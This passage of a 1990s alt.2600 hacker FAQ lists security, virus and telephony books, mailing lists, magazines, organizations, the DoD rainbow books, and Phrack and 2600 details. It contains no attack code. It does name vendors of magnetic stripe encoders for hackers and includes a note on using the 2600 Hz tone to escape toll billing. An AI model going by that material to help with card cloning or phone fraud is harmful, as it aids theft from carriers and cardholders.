+  fARM R0Ad 666           (713)855-0261
+  
+
+09. What are some books of interest to hackers?
+
+General Computer Security
+~~~~~~~~~~~~~~~~~~~~~~~~~
+  Computer Security Basics
+  Author: Deborah Russell and G.T. Gengemi Sr.
+  Publisher: O'Reilly & Associates, Inc.
+  Copyright Date: 1991
+  ISBN: 0-937175-71-4
+
+        This is an excellent book.  It gives a broad overview of
+        computer security without sacrificing detail.  A must read for
+        the beginning security expert.
+
+  Computer Security Management
+  Author: Karen Forcht
+  Publisher: Boyd and Fraser
+  Copyright Date: 1994
+  ISBN: 0-87835-881-1
+
+  Information Systems Security
+  Author: Philip Fites and Martin Kratz
+  Publisher: Van Nostrad Reinhold
+  Copyright Date: 1993
+  ISBN: 0-442-00180-0
+
+  Computer Related Risks
+  Author: Peter G. Neumann
+  Publisher: Addison-Wesley
+  Copyright Date: 1995
+  ISBN: 0-201-55805-X
+
+  Computer Security Management
+  Author: Karen Forcht
+  Publisher: boyd & fraser publishing company
+  Copyright Date: 1994
+  ISBN: 0-87835-881-1
+
+  The Stephen Cobb Complete Book of PC and LAN Security
+  Author: Stephen Cobb
+  Publisher: Windcrest Books
+  Copyright Date: 1992
+  ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)
+
+  Security in Computing
+  Author: Charles P. Pfleeger
+  Publisher: Prentice Hall
+  Copyright Date: 1989
+  ISBN: 0-13-798943-1.
+
+  Building a Secure Computer System
+  Author: Morrie Gasser
+  Publisher: Van Nostrand Reinhold Co., New York.
+  Copyright Date:
+  ISBN: 0-442-23022-2
+
+  Modern Methods for Computer Security
+  Author: Lance Hoffman
+  Publisher: Prentice Hall
+  Copyright Date: 1977
+  ISBN:
+
+  Windows NT 3.5 Guidelines for Security, Audit and Control
+  Author:
+  Publisher: Microsoft Press
+  Copyright Date:
+  ISBN: 1-55615-814-9
+
+
+Unix System Security
+~~~~~~~~~~~~~~~~~~~~
+  Practical Unix Security
+  Author: Simson Garfinkel and Gene Spafford
+  Publisher: O'Reilly & Associates, Inc.
+  Copyright Date: 1991
+  ISBN: 0-937175-72-2
+
+        Finally someone with a very firm grasp of Unix system security
+        gets down to writing a book on the subject.  Buy this book.
+        Read this book.
+
+  Firewalls and Internet Security
+  Author: William Cheswick and Steven Bellovin
+  Publisher: Addison Wesley
+  Copyright Date: 1994
+  ISBN: 0-201-63357-4
+
+  Unix System Security
+  Author: Rik Farrow
+  Publisher: Addison Wesley
+  Copyright Date: 1991
+  ISBN: 0-201-57030-0
+
+  Unix Security: A Practical Tutorial
+  Author: N. Derek Arnold
+  Publisher: McGraw Hill
+  Copyright Date: 1993
+  ISBN: 0-07-002560-6
+
+  Unix System Security: A Guide for Users and Systems Administrators
+  Author: David A. Curry
+  Publisher: Addison-Wesley
+  Copyright Date: 1992
+  ISBN: 0-201-56327-4
+
+  Unix System Security
+  Author: Patrick H. Wood and Stephen G. Kochan
+  Publisher: Hayden Books
+  Copyright Date: 1985
+  ISBN: 0-672-48494-3
+
+  Unix Security for the Organization
+  Author: Richard Bryant
+  Publisher: Sams
+  Copyright Date: 1994
+  ISBN: 0-672-30571-2
+
+
+Network Security
+~~~~~~~~~~~~~~~~
+  Network Security Secrets
+  Author: David J. Stang and Sylvia Moon
+  Publisher: IDG Books
+  Copyright Date: 1993
+  ISBN: 1-56884-021-7
+
+        Not a total waste of paper, but definitely not worth the
+        $49.95 purchase price.  The book is a rehash of previously
+        published information.  The only secret we learn from reading
+        the book is that Sylvia Moon is a younger woman madly in love
+        with the older David Stang.
+
+  Complete Lan Security and Control
+  Author: Peter Davis
+  Publisher: Windcrest / McGraw Hill
+  Copyright Date: 1994
+  ISBN: 0-8306-4548-9 and 0-8306-4549-7
+
+  Network Security
+  Author: Steven Shaffer and Alan Simon
+  Publisher: AP Professional
+  Copyright Date: 1994
+  ISBN: 0-12-638010-4
+
+
+Cryptography
+~~~~~~~~~~~~
+  Applied Cryptography: Protocols, Algorithms, and Source Code in C
+  Author: Bruce Schneier
+  Publisher: John Wiley & Sons
+  Copyright Date: 1994
+  ISBN: 0-471-59756-2
+
+        Bruce Schneier's book replaces all other texts on
+        cryptography.  If you are interested in cryptography, this is
+        a must read.  This may be the first and last book on
+        cryptography you may ever need to buy.
+
+  Cryptography and Data Security
+  Author: Dorothy Denning
+  Publisher: Addison-Wesley Publishing Co.
+  Copyright Date: 1982
+  ISBN: 0-201-10150-5
+
+  Protect Your Privacy: A Guide for PGP Users
+  Author: William Stallings
+  Publisher: Prentice-Hall
+  Copyright Date: 1994
+  ISBN: 0-13-185596-4
+
+
+Programmed Threats
+~~~~~~~~~~~~~~~~~~
+  The Little Black Book of Computer Viruses
+  Author: Mark Ludwig
+  Publisher: American Eagle Publications
+  Copyright Date: 1990
+  ISBN: 0-929408-02-0
+
+        The original, and still the best, book on computer viruses.
+        No media hype here, just good clean technical information.
+
+  Computer Viruses, Artificial Life and Evolution
+  Author: Mark Ludwig
+  Publisher: American Eagle Publications
+  Copyright Date: 1993
+  ISBN: 0-929408-07-1
+
+  Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
+        Threats to Your System
+  Author: John McAfee and Colin Haynes
+  Publisher: St. Martin's Press
+  Copyright Date: 1989
+  ISBN: 0-312-03064-9 and 0-312-02889-X
+
+  The Virus Creation Labs: A Journey Into the Underground
+  Author: George Smith
+  Publisher: American Eagle Publications
+  Copyright Date: 1994
+  ISBN:
+
+
+Telephony
+~~~~~~~~~
+  Engineering and Operations in the Bell System
+  Author: R.F. Rey
+  Publisher: Bell Telephont Laboratories
+  Copyright Date: 1983
+  ISBN: 0-932764-04-5
+
+        Although hopelessly out of date, this book remains *THE* book
+        on telephony.  This book is 100% Bell, and is loved by phreaks
+        the world over.
+
+  Telephony: Today and Tomorrow
+  Author: Dimitris N. Chorafas
+  Publisher: Prentice-Hall
+  Copyright Date: 1984
+  ISBN: 0-13-902700-9
+
+  The Telecommunications Fact Book and Illustrated Dictionary
+  Author: Ahmed S. Khan
+  Publisher: Delmar Publishers, Inc.
+  Copyright Date: 1992
+  ISBN: 0-8273-4615-8
+
+        I find this dictionary to be an excellent reference book on
+        telephony, and I recommend it to anyone with serious
+        intentions in the field.
+
+  Tandy/Radio Shack Cellular Hardware
+  Author: Judas Gerard and Damien Thorn
+  Publisher: Phoenix Rising Communications
+  Copyright Date: 1994
+  ISBN:
+
+  The Phone Book
+  Author: Carl Oppendahl
+  Publisher: Consumer Reports
+  Copyright Date:
+  ISBN: 0-89043-364-x
+
+        Listing of every cellular ID in the us, plus roaming ports,
+        and info numbers for each carrier.
+
+  Principles of Caller I.D.
+  Author:
+  Publisher: International MicroPower Corp.
+  Copyright Date:
+  ISBN:
+
+
+Hacking History and Culture
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+  The Hacker Crackdown: Law and Disorder on the Electronic Frontier
+  Author: Bruce Sterling
+  Publisher: Bantam Books
+  Copyright Date: 1982
+  ISBN: 0-553-56370-X
+
+        Bruce Sterling has recently released the book FREE to the net.
+        The book is much easier to read in print form, and the
+        paperback is only $5.99.  Either way you read it, you will be
+        glad you did.  Mr. Sterling is an excellent science fiction
+        author and has brought his talent with words to bear on the
+        hacking culture.  A very enjoyable reading experience.
+
+  Cyberpunk
+  Author: Katie Hafner and John Markoff
+  Publisher: Simon and Schuster
+  Copyright Date: 1991
+  ISBN: 0-671-77879-X
+
+  The Cuckoo's Egg
+  Author: Cliff Stoll
+  Publisher: Simon and Schuster
+  Copyright Date: 1989
+  ISBN: 0-671-72688-9
+
+  Hackers: Heroes of the Computer Revolution
+  Author: Steven Levy
+  Publisher: Doubleday
+  Copyright Date: 1984
+  ISBN: 0-440-13495-6
+
+
+Unclassified
+~~~~~~~~~~~~
+  The Hacker's Handbook
+  Author: Hugo Cornwall
+  Publisher: E. Arthur Brown Company
+  Copyright Date:
+  ISBN: 0-912579-06-4
+
+  Secrets of a Super Hacker
+  Author: The Knightmare
+  Publisher: Loompanics
+  Copyright Date: 1994
+  ISBN: 1-55950-106-5
+
+        The Knightmare is no super hacker.  There is little or no real
+        information in this book.  The Knightmare gives useful advice
+        like telling you not to dress up before going trashing.
+        The Knightmare's best hack is fooling Loompanics into
+        publishing this garbage.
+
+  The Day The Phones Stopped
+  Author: Leonard Lee
+  Publisher: Primus / Donald I Fine, Inc.
+  Copyright Date: 1992
+  ISBN: 1-55611-286-6
+
+        Total garbage.  Paranoid delusions of a lunatic.  Less factual
+        data that an average issue of the Enquirer.
+
+  Information Warfare
+  Author: Winn Swartau
+  Publisher: Thunder Mountain Press
+  Copyright Date: 1994
+  ISBN: 1-56025-080-1
+
+  An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
+  Author: Doug Richardson
+  Publisher: Salamander Press
+  Copyright Date:
+  ISBN: 0-668-06497-8
+
+
+10. What are some videos of interest to hackers?
+
+  'Unauthorized Access' by Annaliza Savage
+  $25 on VH S format in 38-min
+  Savage Productions
+  1803 Mission St., #406
+  Santa Cruz, CA 95060
+
+
+11. What are some mailing lists of interest to hackers?
+
+  Academic Firewalls
+  Reflector Address:
+  Registration Address: Send a message to majordomo@greatcircle.com
+                        containing the line "subscribe firewalls user@host"
+
+  Bugtraq
+  Reflector Address:    bugtraq@fc.net
+  Registration Address: bugtraq-request@fc.net
+
+  Cert Tools
+  Reflector Address:    cert-tools@cert.org
+  Registration Address: cert-tools-request@cert.org
+
+  Computers and Society
+  Reflector Address:    Comp-Soc@limbo.intuitive.com
+  Registration Address: taylor@limbo.intuitive.com
+
+  Coordinated Feasibility Effort to Unravel State Data
+  Reflector Address:    ldc-sw@cpsr.org
+  Registration Address:
+
+  CPSR Announcement List
+  Reflector Address:    cpsr-announce@cpsr.org
+  Registration Address:
+
+  CPSR - Intellectual Property
+  Reflector Address:    cpsr-int-prop@cpsr.org
+  Registration Address:
+
+  CPSR - Internet Library
+  Reflector Address:    cpsr-library@cpsr.org
+  Registration Address:
+
+  DefCon Announcement List
+  Reflector Address:
+  Registration Address: Send a message to majordomo@fc.net containing
+                        the line "subscribe dc-announce"
+
+  DefCon Chat List
+  Reflector Address:
+  Registration Address: Send a message to majordomo@fc.net containing
+                        the line "subscribe dc-stuff"
+
+  IDS (Intruder Detection Systems)
+  Reflector Address:
+  Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au
+                        containing the line "subscribe ids"
+
+  Macintosh Security
+  Reflector Address:    mac-security@eclectic.com
+  Registration Address: mac-security-request@eclectic.com
+
+  NeXT Managers
+  Reflector Address:
+  Registration Address: next-managers-request@stolaf.edu
+
+  Phiber-Scream
+  Reflector Address:
+  Registration Address: Send a message to listserv@netcom.com
+                        containing the line "subscribe phiber-scream user@host"
+
+  phruwt-l (Macintosh H/P)
+  Reflector Address:
+  Registration Address: Send a message to filbert@netcom.com
+                        with the subject "phruwt-l"
+
+  rfc931-users
+  Reflector Address:    rfc931-users@kramden.acf.nyu.edu
+  Registration Address: brnstnd@nyu.edu
+
+  RSA Users
+  Reflector Address:    rsaref-users@rsa.com
+  Registration Address: rsaref-users-request@rsa.com
+
+
+12. What are some print magazines of interest to hackers?
+
+2600 - The Hacker Quarterly
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+E-mail address: 2600@well.sf.ca.us
+
+Subscription Address: 2600 Subscription Dept
+                      PO Box 752
+                      Middle Island, NY  11953-0752
+
+Letters and article submission address: 2600 Editorial Dept
+                                        PO Box 99
+                                        Middle Island, NY  11953-0099
+
+Subscriptions: United States: $21/yr individual, $50 corporate.
+               Overseas: $30/yr individual, $65 corporate.
+
+
+Gray Areas
+~~~~~~~~~~
+Gray Areas examines gray areas of law and morality and subject matter
+which is illegal, immoral and/oe controversial. Gray Areas explores
+why hackers hack and puts hacking into a sociological framework of
+deviant behavior.
+
+E-Mail Address: grayarea@well.sf.ca.us
+E-Mail Address: grayarea@netaxs.com
+
+U.S. Mail Address: Gray Areas
+                   PO Box 808
+                   Broomall, PA 19008
+
+Subscriptions: $26.00 4 issues first class
+               $34.00 4 issues foreign (shipped air mail)
+
+
+Wired
+~~~~~
+Subscription Address: subscriptions@wired.com
+                  or: Wired
+                      PO Box 191826
+                      San Francisco, CA 94119-9866
+
+Letters and article submission address: guidelines@wired.com
+                                    or: Wired
+                                        544 Second Street
+                                        San Francisco, CA 94107-1427
+
+Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
+
+
+Nuts & Volts
+~~~~~~~~~~~~
+T& L Publications
+430 Princeland Court
+Corona, CA 91719
+(800)783-4624 (Voice) (Subscription Only Order Line)
+(909)371-8497 (Voice)
+(909)371-3052 (Fax)
+CIS: 74262,3664
+
+
+13. What are some e-zines of interest to hackers?
+
+CoTNo: Communications of The New Order    ftp.etext.org  /pub/Zines/CoTNo
+Empire Times                              ftp.etext.org  /pub/Zines/Emptimes
+Phrack                                    ftp.fc.net     /pub/phrack
+
+
+14. What are some organizations of interest to hackers?
+
+Computer Professionals for Social Responsibility (CPSR)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+CPSR empowers computer professionals and computer users to advocate
+for the responsible use of information technology and empowers all who
+use computer technology to participate in the public debate.   As
+technical experts, CPSR members provide the public and policymakers
+with realistic assessments of the power, promise, and limitations of
+computer technology.  As an organization of concerned citizens, CPSR
+directs public attention to critical choices concerning the
+applications of computing and how those choices affect society.
+
+By matching unimpeachable technical information with policy
+development savvy, CPSR uses minimum dollars to have maximum impact
+and encourages broad public participation in the shaping of technology
+policy.
+
+Every project we undertake is based on five principles:
+
+*  We foster and support public discussion of and public
+   responsibility for decisions involving the use of computers in
+   systems critical to society.
+
+*  We work to dispel popular myths about the infallibility of
+   technological systems.
+
+*  We challenge the assumption that technology alone can solve
+   political and social problems.
+
+*  We critically examine social and technical issues within the
+   computer profession, nationally and internationally.
+
+*  We encourage the use of computer technology to improve the quality
+   of life.
+
+CPSR Membership Categories
+  75  REGULAR MEMBER
+  50  Basic member
+ 200  Supporting member
+ 500  Sponsoring member
+1000  Lifetime member
+  20  Student/low income member
+  50  Foreign subscriber
+  50  Library/institutional subscriber
+
+CPSR National Office
+P.O. Box 717
+Palo Alto, CA  94301
+415-322-3778
+415-322-3798 (FAX)
+E-mail: cpsr@csli.stanford.edu
+
+
+Electronic Frontier Foundation (EFF)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
+of policies and activities that will advance freedom and openness in
+computer-based communications. It is a member-supported, nonprofit
+group that grew from the conviction that a new public interest
+organization was needed in the information age; that this organization
+would enhance and protect the democratic potential of new computer
+communications technology. From the beginning, the EFF determined to
+become an organization that would combine technical, legal, and public
+policy expertise, and would apply these skills to the myriad issues
+and concerns that arise whenever a new communications medium is born.
+
+Memberships are $20.00 per year for students, $40.00 per year for
+regular members, and $100.00 per year for organizations.
+
+The Electronic Frontier Foundation, Inc.
+666 Pennsylvania Avenue S.E., Suite 303
+Washington, D.C.  20003
++1 202 544 9237
++1 202 547 5481 FAX
+Internet: eff@eff.org
+
+
+Free Software Foundation (FSF)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+GNU
+~~~
+
+
+The League for Programming Freedom (LPF)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The League for Programming Freedom is an organization of people who
+oppose the attempt to monopolize common user interfaces through "look
+and feel" copyright lawsuits.  Some of us are programmers, who worry
+that such monopolies will obstruct our work.  Some of us are users,
+who want new computer systems to be compatible with the interfaces we
+know.  Some are founders of hardware or software companies, such as
+Richard P. Gabriel. Some of us are professors or researchers,
+including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
+Boyer and Patrick Winston.
+
+"Look and feel" lawsuits aim to create a new class of government-
+enforced monopolies broader in scope than ever before.  Such a system
+of user-interface copyright would impose gratuitous incompatibility,
+reduce competition, and stifle innovation.
+
+We in the League hope to prevent these problems by preventing
+user-interface copyright.  The League is NOT opposed to copyright law
+as it was understood until 1986 -- copyright on particular programs.
+Our aim is to stop changes in the copyright system which would take
+away programmers' traditional freedom to write new programs compatible
+with existing programs and practices.
+
+Annual dues for individual members are $42 for employed professionals,
+$10.50 for students, and $21 for others.  We appreciate activists, but
+members who cannot contribute their time are also welcome.
+
+To contact the League, phone (617) 243-4091, send Internet mail to the
+address league@prep.ai.mit.edu, or write to:
+
+League for Programming Freedom
+1 Kendall Square #143
+P.O. Box 9171
+Cambridge, MA 02139 USA
+
+
+SotMesc
+~~~~~~~
+Founded in 1989, SotMesc is dedicated to preserving the integrity and
+cohesion of the computing society.  By promoting computer education,
+liberties and efficiency, we believe we can secure freedoms for all
+computer users while retaining privacy.
+
+SotMesc maintains the CSP Internet mailing list, the SotMesc
+Scholarship Fund, and the SotMesc Newsletter.
+
+The SotMESC is financed partly by membership fees, and donations, but
+mostly by selling hacking, cracking, phreaking, electronics, internet,
+and virus information and programs on disk and bound paper media.
+
+SotMesc memberships are $20 to students and $40 to regular members.
+
+SotMESC
+P.O. Box 573
+Long Beach, MS  39560
+
+
+Computer Emergency Response Team (CERT
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+CERT is the Computer Emergency Response Team that was formed by the
+Defense Advanced Research Projects Agency (DARPA) in November 1988 in
+response to the needs exhibited during the Internet worm incident.
+The CERT charter is to work with the Internet community to facilitate
+its response to computer security events involving Internet hosts, to
+take proactive steps to raise the community's awareness of computer
+security issues, and to conduct research targeted at improving the
+security of existing systems.
+
+CERT products and services include 24-hour technical assistance for
+responding to computer security incidents, product vulnerability
+assistance, technical documents, and seminars.  In addition, the team
+maintains a number of mailing lists (including one for CERT
+advisories) and provides an anonymous FTP server:  cert.org
+(192.88.209.5), where security-related documents, past CERT
+advisories, and tools are archived.
+
+CERT contact information:
+
+U.S. mail address
+  CERT Coordination Center
+  Software Engineering Institute
+  Carnegie Mellon University
+  Pittsburgh, PA 15213-3890
+  U.S.A.
+
+Internet E-mail address
+  cert@cert.org
+
+Telephone number
+  (412)268-7090 (24-hour hotline)
+  CERT Coordination Center personnel answer
+  7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
+  emergencies during other hours.
+
+FAX number
+  (412)268-6989
+
+
+15. Where can I purchase a magnetic stripe encoder/decoder?
+
+CPU Advance
+PO Box 2434
+Harwood Station
+Littleton, MA  01460
+(508)624-4819 (Fax)
+
+Omron Electronics, Inc.
+One East Commerce Drive
+Schaumburg, IL  60173
+(800)556-6766 (Voice)
+(708)843-7787 (Fax)
+
+Security Photo Corporation
+1051 Commonwealth Avenue
+Boston, MA 02215
+(800)533-1162 (Voice)
+(617)783-3200 (Voice)
+(617)783-1966 (Voice)
+
+Timeline Inc,
+23605 Telo Avenue
+Torrence, CA 90505
+(800)872-8878 (Voice)
+(800)223-9977 (Voice)
+
+Alltronics
+2300 Zanker Road
+San Jose CA 95131
+(408) 943-9774 Voice
+(408) 943-9776 Fax
+(408) 943-0622 BBS
+Part Number: 92U067
+
+Atalla Corp
+San Jose, CA
+(408) 435-8850
+
+
+16. What are the rainbow books and how can I get them?
+
+Orange Book
+DoD 5200.28-STD
+Department of Defense Trusted Computer System Evaluation Criteria
+
+Green Book
+CSC-STD-002-85
+Department of Defense Password Management Guideline
+
+Yellow Book
+CSC-STD-003-85
+Computer Security Requirements -- Guidance for Applying the Department
+of Defense Trusted Computer System Evaluation Criteria in Specific
+Environments
+
+Yellow Book
+CSC-STD-004-85
+Technical Rationale Behind CSC-STD-003-85: Computer Security
+Requirements.  Guidance for Applying the Department of Defense Trusted
+Computer System Evaluation Criteria in Specific Environments.
+
+Tan Book
+NCSC-TG-001
+A Guide to Understanding Audit in Trusted Systems
+
+Bright Blue Book
+NCSC-TG-002
+Trusted Product Evaluation - A Guide for Vendors
+
+Neon Orange Book
+NCSC-TG-003
+A Guide to Understanding Discretionary Access Control in Trusted
+Systems
+
+Teal Green Book
+NCSC-TG-004
+Glossary of Computer Security Terms
+
+Red Book
+NCSC-TG-005
+Trusted Network Interpretation of the Trusted Computer System
+Evaluation Criteria
+
+Orange Book
+NCSC-TG-006
+A Guide to Understanding Configuration Management in Trusted Systems
+
+Burgundy Book
+NCSC-TG-007
+A Guide to Understanding Design Documentation in Trusted Systems
+
+Dark Lavender Book
+NCSC-TG-008
+A Guide to Understanding Trusted Distribution in Trusted Systems
+
+Venice Blue Book
+NCSC-TG-009
+Computer Security Subsystem Interpretation of the Trusted Computer
+System Evaluation Criteria
+
+Aqua Book
+NCSC-TG-010
+A Guide to Understanding Security Modeling in Trusted Systems
+
+Dark Red Book
+NCSC-TG-011
+Trusted Network Interpretation Environments Guideline -- Guidance for
+Applying the Trusted Network Interpretation
+
+Pink Book
+NCSC-TG-013
+Rating Maintenance Phase -- Program Document
+
+Purple Book
+NCSC-TG-014
+Guidelines for Formal Verification Systems
+
+Brown Book
+NCSC-TG-015
+A Guide to Understanding Trusted Facility Management
+
+Yellow-Green Book
+NCSC-TG-016
+Guidelines for Writing Trusted Facility Manuals
+
+Light Blue
+NCSC-TG-017
+A Guide to Understanding Identification and Authentication in Trusted
+Systems
+
+Light Blue Book
+NCSC-TG-018
+A Guide to Understanding Object Reuse in Trusted Systems
+
+Blue Book
+NCSC-TG-019
+Trusted Product Evaluation Questionnaire
+
+Gray Book
+NCSC-TG-020A
+Trusted Unix Working Group (TRUSIX) Rationale for Selecting
+Access Control List Features for the Unix System
+
+Lavender Book
+NCSC-TG-021
+Trusted Data Base Management System Interpretation of the Trusted
+Computer System Evaluation Criteria
+
+Yellow Book
+NCSC-TG-022
+A Guide to Understanding Trusted Recovery in Trusted Systems
+
+Bright Orange Book
+NCSC-TG-023
+A Guide to Understandng Security Testing and Test Documentation in
+Trusted Systems
+
+Purple Book
+NCSC-TG-024  (Volume 1/4)
+A Guide to Procurement of Trusted Systems: An Introduction to
+Procurement Initiators on Computer Security Requirements
+
+Purple Book
+NCSC-TG-024 (Volume 2/4)
+A Guide to Procurement of Trusted Systems: Language for RFP
+Specifications and Statements of Work - An Aid to Procurement
+Initiators
+
+Purple Book
+NCSC-TG-024  (Volume 3/4)
+A Guide to Procurement of Trusted Systems: Computer Security Contract
+Data Requirements List and Data Item Description Tutorial
+
++Purple Book
++NCSC-TG-024  (Volume 4/4)
++A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
++Proposal Document - An Aid to Procurement Initiators and Contractors
+
+Green Book
+NCSC-TG-025
+A Guide to Understanding Data Remanence in Automated Information
+Systems
+
+Hot Peach Book
+NCSC-TG-026
+A Guide to Writing the Security Features User's Guide for Trusted Systems
+
+Turquiose Book
+NCSC-TG-027
+A Guide to Understanding Information System Security Officer
+Responsibilities for Automated Information Systems
+
+Violet Book
+NCSC-TG-028
+Assessing Controlled Access Protection
+
+Blue Book
+NCSC-TG-029
+Introduction to Certification and Accreditation
+
+Light Pink Book
+NCSC-TG-030
+A Guide to Understanding Covert Channel Analysis of Trusted Systems
+
+C1 Technical Report-001
+Computer Viruses: Prevention, Detection, and Treatment
+
+*C Technical Report 79-91
+*Integrity in Automated Information Systems
+
+*C Technical Report 39-92
+*The Design and Evaluation of INFOSEC systems: The Computer Security
+*Contributions to the Composition Discussion
+
+NTISSAM COMPUSEC/1-87
+Advisory Memorandum on Office Automation Security Guideline
+
+--
+
+You can get your own free copy of any or all of the books by writing
+or calling:
+
+       INFOSEC Awareness Division
+       ATTN: X711/IAOC
+       Fort George G. Meade, MD  20755-6000
+
+       Barbara Keller
+       (410) 766-8729
+
+If you ask to be put on the mailing list, you'll get a copy of each new
+book as it comes out (typically a couple a year).
+
+[* == I have not personally seen this book]
+[+ == I have not personally seen this book, and I believe it may not]
+[     be available]
+
+
+
+
+Section D: 2600
+~~~~~~~~~~~~~~~
+
+01. What is alt.2600?
+
+Alt.2600 is a Usenet newsgroup for discussion of material relating to
+2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
+game machine.  Len@netsys.com created the group on Emmanuel
+Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
+Magazine. Following the barrage of postings about the Atari machine to
+alt.2600, an alt.atari.2600 was created to divert all of the atari
+traffic from alt.2600.  Atari 2600 people are advised to hie over to
+rec.games.video.classic.
+
+
+02. What does "2600" mean?
+
+	2600Hz was a tone that was used by early phone phreaks (or
+phreakers) in the 80's, and some currently.  If the tone was sent down the
+line at the proper time, one could get away with all sorts of fun stuff.  
+
+A note from Emmanuel Goldstein:
+	
+"The Atari 2600 has NOTHING to do with blue boxes or telephones
+or the 2600 hertz tone.  The 2600 hertz tone was simply the first
+step towards exploring the network.  If you were successful at 
+getting a toll call to drop, then billing would stop at that
+point but there would be billing for the number already dialed
+up until the point of seizure.  800 numbers and long distance
+information were both free in the past and records of who called
+what were either non-existent or very obscure with regards to
+these numbers.  This, naturally, made them more popular than
+numbers that showed up on a bill, even if it was only for
+a minute.  Today, many 800 numbers go overseas, which provides
+a quick and free way into another country's phone system
+which may be more open for exploration."
+
+
+03. Are there on-line versions of 2600 available?
+
+	No.
+
+
+04. I can't find 2600 at any bookstores.  What can I do?
+
+Subscribe.  Or, let 2600 know via the subscription address that you
+think 2600 should be in the bookstore.  Be sure to include the
+bookstores name and address.
+
+
+05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
+
+A note from Emmanuel Goldstein:
+
+  We've been selling 2600 at the same newsstand price ($4) since 1988
+  and we hope to keep it at that price for as long as we can get away
+  with it. At the same time, $21 is about the right price to cover
+  subscriber costs, including postage and record keeping, etc. People
+  who subscribe don't have to worry about finding an issue someplace,
+  they tend to get issues several weeks before the newsstands get
+  them, and they can take out free ads in the 2600 Marketplace.
+
+  This is not uncommon in the publishing industry.  The NY Times, for
+  example, costs $156.50 at the newsstands, and $234.75 delivered to your
+  door.
+
+
+Section E: Phrack Magazine
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+01. What Is Phrack Magazine?
+
+    Phrack Magazine is one of the longest running electronic-based publications
+    in the world.  Originally founded in 1985 by Knight Lightning and Taran
+    King, it has survived several incarnations of editors and still remains
+    true to its underground roots.  Since its inception, Phrack has been
+    providing the hacker community with information on operating systems,
+    networking technologies and telephony, as well as relaying human interest
+    features of interest to the international computer underground.
+
+    During its lifetime, Phrack has always been at the center of controversy.
+    Since the magazine has always been openly available, it presented law
+    enforcement officials with what they percieved to be a direct link into
+    the secret society of computer hackers.  Not truly understnding either
+    the the spirit of the magazine or the community for which it was written,
+     Federal Agents and Prosecutors began to target Phrack Magazine and those
+    affiliated with it.
+
+    "The Hacker Crackdown" by Bruce Sterling relays the details surrounding
+    some of these events.
+
+    Phrack Magazine is now in its 10th year of publication, and is registered
+    with the Library of Congress as ISSN 1068-1035, and is protected by
+    US Copyright Law.
+
+02. How can I reach Phrack Magazine?
+
+    You can reach Phrack by email at:  phrack@well.com, phrack@fc.net or
+    phrackmag@aol.com.  These addresses are listed in order of
+    preference.  Only AOL users should email the phrackmag@aol.com.
+
+    Phrack can be reached by the postal service at:
+
+    Phrack Magazine
+    603 W. 13th #1A-278
+    Austin, TX 78701
+
+03. Who Publishes Phrack?
+
+   Phrack Magazine is published by Chris Goggans, aka Erik Bloodaxe.  It is
+   hobbled together, touched up, spell checked and compressed on an overworked
+   486-66.  It is then ftp'ed over to a BSDI UNIX machine where it is sent to
+   the masses.
+
+04. How Often Does Phrack Go Out?
+
+    Phrack goes out roughly quarterly.  It is often sent out later than every
+    three months due to other more demanding obligations faced by its editor.
+    The regularity of Phrack is really based upon the amount of information
+    sent in.  Phrack depends solely upon submissions to get published at all.
+
+05. How Do I Subscribe?
+
+    To subscribe to Phrack magazine, merely email phrack@well.com and ask to
+    be placed on the mailing list.
+
+    Any encrypted subscriptions requests will be ignored.
+
+    Phrack will not accept subscription requests from any anonymous remailers or
+    from sites in the fidonet domain.  The anonymous remailers consistently
+    bounce our mailings causing a big headache, so we won't use them.  The
+    fidonet domain administrators have asked us not to mail Phrack to fido users,
+    because of the huge load it places on their outgoing spools (costing them a
+    lot of money to send).
+
+06. Why Don't I Get Any Response When I E-mail Phrack?
+
+    Because of the high volume of mail sent to the Phrack email address,
+    not everyone gets a response.  All subscription requests are saved and
+    added to the master list, but there is no automatic reply.  All other
+    messages are responded to as they are read, with the exception of PGP'd
+    messages.  All PGP'd email is stored for later decryption, and is almost
+    never responded to, unless it is incredibly urgent.
+
+07. Does Phrack Cost Money?
+
+    Phrack Magazine charges a registration fee of $100.00 per user for any
+    professional use of the magazine and the information contained therein.
+    Information regarding this registration fee is contained at the beginning
+    of every issue of Phrack.
+
+08. How Can I Submit Articles?
+
+    Articles are both wanted and needed.  Phrack only exists if people write
+    for it.  There is no regular writing staff, there is only the editor, who
+    cannot write the entire thing himself.
+
+    Articles can be sent to Phrack via email or snailmail (on paper or
+    IBM-compatible diskette).  Articles should be in ASCII text format.  Do
+    not include any clever graphics or ANSI art.  You can use Phrack's PGP key
+    to encrypt articles, but send the files in the ASCII armor format.
+
+    Please try to avoid sending files as MIME-compliant mail attachments.
+
+09. What Is Phrack's PGP Key?
+
+    -----BEGIN PGP PUBLIC KEY BLOCK-----
+    Version: 2.6
+
+    mQCNAizMHvgAAAEEAJuIW5snS6e567/34+nkSA9cn2BHFIJLfBm3m0EYHFLB0wEP
+    Y/CIJ5NfcP00R+7AteFgFIhu9NrKNJtrq0ZMAOmiqUWkSzSRLpwecFso8QvBB+yk
+    Dk9BF57GftqM5zesJHqO9hjUlVlnRqYFT49vcMFTvT7krR9Gj6R4oxgb1CldAAUR
+    tBRwaHJhY2tAd2VsbC5zZi5jYS51cw==
+    =evjv
+    -----END PGP PUBLIC KEY BLOCK-----
+
+10. Where Can I Get Back Issues?
+
